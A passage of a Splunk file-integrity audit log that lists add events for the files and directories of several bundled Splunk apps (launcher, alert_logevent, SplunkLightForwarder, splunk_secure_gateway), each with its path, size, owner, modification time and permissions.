action=add,path="/opt/splunk/etc/apps/launcher/appserver/static/trans.gif", isdir=0, size=43, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.323, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/appserver/static/images", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.320, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/appserver/static/application.css", isdir=0, size=11125, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.316, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/appserver/static/appIcon_null.png", isdir=0, size=232, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.311, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/appserver/static", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.307, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/default/data/ui/nav/default.xml", isdir=0, size=50, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.302, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/default/data/ui/views/home.xml", isdir=0, size=101, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.197, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/default/data/ui/views", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.193, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/default/data/ui/nav", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.189, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/default/data/ui", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.185, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/default/launcher.conf", isdir=0, size=114, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.181, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/default/data", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.175, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/default/app.conf", isdir=0, size=131, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.171, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/metadata/default.meta", isdir=0, size=206, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.167, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/README/launcher.conf.spec", isdir=0, size=310, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.163, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.159, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.155, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/appserver", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.151, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/README", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.047, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_logevent/appserver/static/logevent.png", isdir=0, size=1423, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.043, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_logevent/appserver/static", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:20 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.038, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_logevent/default/data/ui/alerts/logevent.html", isdir=0, size=3302, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.034, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_logevent/default/data/ui/alerts", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:20 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.029, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_logevent/default/data/ui", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.024, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_logevent/default/restmap.conf", isdir=0, size=304, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.020, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_logevent/default/data", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.015, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_logevent/default/app.conf", isdir=0, size=230, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.010, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_logevent/default/alert_actions.conf", isdir=0, size=271, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.007, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_logevent/metadata/default.meta", isdir=0, size=169, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.903, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_logevent/README/savedsearches.conf.spec", isdir=0, size=592, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.900, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_logevent/README/alert_actions.conf.spec", isdir=0, size=514, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.896, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_logevent/bin/logevent.py", isdir=0, size=2102, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:35.892, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_logevent/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:20 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:35.889, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_logevent/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:20 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:35.885, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_logevent/bin", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:20 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:35.881, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_logevent/appserver", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:35.876, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_logevent/README", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:20 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:35.872, user=n/a, action=add,path="/opt/splunk/etc/apps/SplunkLightForwarder/default/web.conf", isdir=0, size=74, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.868, user=n/a, action=add,path="/opt/splunk/etc/apps/SplunkLightForwarder/default/server.conf", isdir=0, size=145, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.864, user=n/a, action=add,path="/opt/splunk/etc/apps/SplunkLightForwarder/default/props.conf", isdir=0, size=242, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.860, user=n/a, action=add,path="/opt/splunk/etc/apps/SplunkLightForwarder/default/outputs.conf", isdir=0, size=194, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.855, user=n/a, action=add,path="/opt/splunk/etc/apps/SplunkLightForwarder/default/limits.conf", isdir=0, size=42, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.850, user=n/a, action=add,path="/opt/splunk/etc/apps/SplunkLightForwarder/default/inputs.conf", isdir=0, size=545, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.846, user=n/a, action=add,path="/opt/splunk/etc/apps/SplunkLightForwarder/default/indexes.conf", isdir=0, size=403, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.837, user=n/a, action=add,path="/opt/splunk/etc/apps/SplunkLightForwarder/default/health.conf", isdir=0, size=68, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.830, user=n/a, action=add,path="/opt/splunk/etc/apps/SplunkLightForwarder/default/default-mode.conf", isdir=0, size=901, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.825, user=n/a, action=add,path="/opt/splunk/etc/apps/SplunkLightForwarder/default/app.conf", isdir=0, size=57, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.819, user=n/a, action=add,path="/opt/splunk/etc/apps/SplunkLightForwarder/default/README", isdir=0, size=741, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.712, user=n/a, action=add,path="/opt/splunk/etc/apps/SplunkLightForwarder/metadata/default.meta", isdir=0, size=206, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.707, user=n/a, action=add,path="/opt/splunk/etc/apps/SplunkLightForwarder/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:20 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:35.703, user=n/a, action=add,path="/opt/splunk/etc/apps/SplunkLightForwarder/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:20 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:35.599, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/appserver/templates/self_register.html", isdir=0, size=82, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.595, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/appserver/templates/register.html", isdir=0, size=82, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.590, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/appserver/templates/opt_in.html", isdir=0, size=82, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.586, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/appserver/templates/my_devices.html", isdir=0, size=82, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.581, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/appserver/templates/mdm_saml.html", isdir=0, size=82, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.577, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/appserver/templates/configure.html", isdir=0, size=82, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.573, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/appserver/templates/common.html", isdir=0, size=1034, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.570, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/appserver/templates/app_selection.html", isdir=0, size=82, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.566, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/appserver/templates/all_devices.html", isdir=0, size=82, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.563, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/appserver/static/pages/utils.2.5.7.js", isdir=0, size=326927, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.560, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/appserver/static/pages/self_register.2.5.7.js", isdir=0, size=5308852, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.556, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/appserver/static/pages/register.2.5.7.js", isdir=0, size=6169448, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.552, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/appserver/static/pages/opt_in.2.5.7.js", isdir=0, size=6119601, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.549, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/appserver/static/pages/mdm_saml.2.5.7.js", isdir=0, size=5230518, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.545, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/appserver/static/pages/configure.2.5.7.js", isdir=0, size=8921208, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.542, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/appserver/static/pages/app_selection.2.5.7.js", isdir=0, size=6133695, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.536, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/appserver/static/pages/all_devices.2.5.7.js", isdir=0, size=6801194, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.431, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/appserver/static/pages", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:35.427, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/appserver/static/appIcon.png", isdir=0, size=538, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.421, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/appserver/static/MobileAlertsWebAppFavicon3x.png", isdir=0, size=2728, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.417, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/appserver/static/MobileAlertsWebAppFavicon36x36.png", isdir=0, size=2137, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.409, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/appserver/static/MobileAlertsWebAppFavicon.png", isdir=0, size=3441, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.294, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/appserver/templates", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:35.290, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/appserver/static", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:35.287, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/data/ui/nav/default.xml", isdir=0, size=603, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.283, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/data/ui/views/test_dashboard_single_value.xml", isdir=0, size=610, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.279, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/data/ui/views/subscription_tracing_dashboard.xml", isdir=0, size=6552, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.276, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/data/ui/views/ssg_e2e_wss_test.xml", isdir=0, size=7269, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.272, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/data/ui/views/self_register.xml", isdir=0, size=142, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.268, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/data/ui/views/secure_gateway_status_dashboard.xml", isdir=0, size=16244, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.265, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/data/ui/views/request_tracing_dashboard.xml", isdir=0, size=6720, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.261, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/data/ui/views/register.xml", isdir=0, size=132, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.258, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/data/ui/views/opt_in.xml", isdir=0, size=152, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.254, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/data/ui/views/mobile_tags.xml", isdir=0, size=129, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.250, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/data/ui/views/mdm_saml.xml", isdir=0, size=137, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.245, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/data/ui/views/kvstore_dashboard_client.xml", isdir=0, size=3909, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.241, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/data/ui/views/configure.xml", isdir=0, size=134, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.237, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/data/ui/views/app_selection.xml", isdir=0, size=142, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.232, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/data/ui/views/all_devices.xml", isdir=0, size=134, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.126, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/data/ui/alerts/ssg_mobile_alert.html", isdir=0, size=6747, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:35.122, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/data/ui/views", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:35.117, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/data/ui/nav", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:35.113, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/data/ui/alerts", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:35.108, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/data/ui", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:35.003, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/web.conf", isdir=0, size=2076, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.999, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/securegateway.conf", isdir=0, size=3175, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.994, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/restmap.conf", isdir=0, size=13459, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.988, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/props.conf", isdir=0, size=562, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.984, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/inputs.conf", isdir=0, size=1868, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.980, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/data", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:34.975, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/commands.conf", isdir=0, size=466, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.971, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/collections.conf", isdir=0, size=3173, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.963, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/authorize.conf", isdir=0, size=221, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.955, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/app.conf", isdir=0, size=256, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.950, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default/alert_actions.conf", isdir=0, size=426, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.845, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/metadata/default.meta", isdir=0, size=1650, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.840, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests-2.25.1.dist-info/top_level.txt", isdir=0, size=9, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.836, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests-2.25.1.dist-info/WHEEL", isdir=0, size=110, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.832, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests-2.25.1.dist-info/REQUESTED", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.828, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests-2.25.1.dist-info/RECORD", isdir=0, size=2834, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.824, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests-2.25.1.dist-info/METADATA", isdir=0, size=4168, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.820, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests-2.25.1.dist-info/LICENSE", isdir=0, size=10142, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.815, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests-2.25.1.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.811, 